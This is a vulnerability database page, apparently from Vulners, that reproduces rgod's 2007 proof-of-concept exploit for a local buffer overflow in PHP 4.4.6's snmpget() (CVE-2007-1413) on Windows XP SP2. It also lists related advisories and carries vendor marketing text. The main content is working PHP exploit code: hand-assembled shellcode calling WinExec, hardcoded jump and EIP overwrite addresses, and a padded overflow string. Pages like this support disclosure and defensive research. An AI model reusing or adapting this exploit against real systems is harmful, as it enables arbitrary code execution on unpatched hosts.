Lucene search
+L

PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow

🗓️ 09 Mar 2007 00:00:00Reported by rgodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

PHP 4.4.6 snmpget() object id local buffer overflo

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
PHP 4.x < 4.4.7 / 5.x < 5.2.2 Multiple Vulnerabilities
4 May 200700:00
nessus
Tenable Nessus
PHP < 5.2.4 Multiple Vulnerabilities
3 Sep 200700:00
nessus
CVE
CVE-2007-1413
12 Mar 200723:00
cve
Cvelist
CVE-2007-1413
12 Mar 200723:00
cvelist
Exploit DB
PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow
20 Jul 200700:00
exploitdb
Exploit DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
9 Aug 200700:00
exploitdb
NVD
CVE-2007-1413
12 Mar 200723:19
nvd
OpenVAS
PHP < 5.2.4 Multiple Vulnerabilities
17 Aug 202000:00
openvas
Prion
Buffer overflow
12 Mar 200723:19
prion
RedhatCVE
CVE-2007-1413
30 Oct 201509:36
redhatcve
Rows per page
<?php

// PHP 4.4.6 snmpget() object id local buffer overflow poc exploit
// by rgod
// site: http://retrogod.altervista.org

// win xp sp2 version
// to be launched form the cli


if (!extension_loaded("snmp")){
die("you need the snmp extension loaded.");
}

$____scode=
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"start notepad & ";

$edx="\x64\x8f\x9b\x01"; //jmp scode
$eip="\x73\xdc\x82\x7c"; //0x7C82DC73      jmp edx
$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("\x90",48).$____scode.str_repeat("\x90",48);
//more than 256 chars result in simple eip overwrite
snmpget(1,1,$____suntzu);

?>

# milw0rm.com [2007-03-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.11092
28